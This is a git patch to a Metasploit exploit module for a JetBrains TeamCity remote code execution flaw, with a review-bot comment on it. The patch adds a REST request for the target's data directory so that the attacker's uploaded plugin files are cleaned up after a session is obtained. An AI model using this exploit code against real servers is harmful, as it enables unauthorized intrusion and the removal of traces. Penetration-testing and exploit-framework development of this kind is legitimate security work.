From 30e761831e007851f56e9df3c0ac8b4e774ff8e0 Mon Sep 17 00:00:00 2001
From: sfewer-r7
Date: Fri, 23 Feb 2024 14:00:27 +0000
Subject: [PATCH] we can also register this path for cleanup

---
 .../multi/http/jetbrains_teamcity_rce_0day.rb | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb b/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
index 9b42202b7e..2bcb27059d 100644
--- a/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
+++ b/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb
@@ -346,6 +346,16 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning('Could not discover install path. Unable to register files for cleanup.')
     end
 
+    # On a Linux target we see the extracted plugin file remaining here even after we delete the plugin.
+    # /home/teamcity/.BuildServer/system/caches/plugins.unpacked/XXXXXXXX/
+    if (data_path = get_data_dir_path(token_value))
+      vprint_status("Target data directory path: #{data_path}")
+
+      register_dir_for_cleanup([data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep))
+    else
+      print_warning('Could not discover data directory path. Unable to register files for cleanup.')
+    end
+
     #
     # 7. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java
     # payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin.
@@ -423,6 +433,23 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
+  def get_data_dir_path(token_value)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'),
+      'headers' => {
+        'Authorization' => "Bearer #{token_value}"
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to request data directory path.')
+      return nil
+    end
+
+    res.body
+  end
+
   def get_build_number(token_value)
     res = send_request_cgi(
       'method' => 'GET',
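Review bot: `get_data_dir_path` in the second hunk returns `res.body` unprocessed, and the first hunk splices that value straight into `[data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep)`, so a trailing newline, surrounding whitespace or an empty 200 response from the server yields a cleanup path that never matches the real directory and is silently left behind at session teardown. Because the value is target-supplied, I would normalise it in the helper before returning it, `path = res.body.to_s.strip` / `return nil if path.empty?` / `path`, which also routes the empty case through the existing 'Could not discover data directory path' warning rather than a misleading "registered" outcome. A trailing separator on the returned path would produce a doubled separator after the join; whether `sep` is derived from the install path discovered earlier is not visible here, so that check may belong wherever `sep` is set. The enclosing `exploit` method of the first hunk starts and ends outside the hunk.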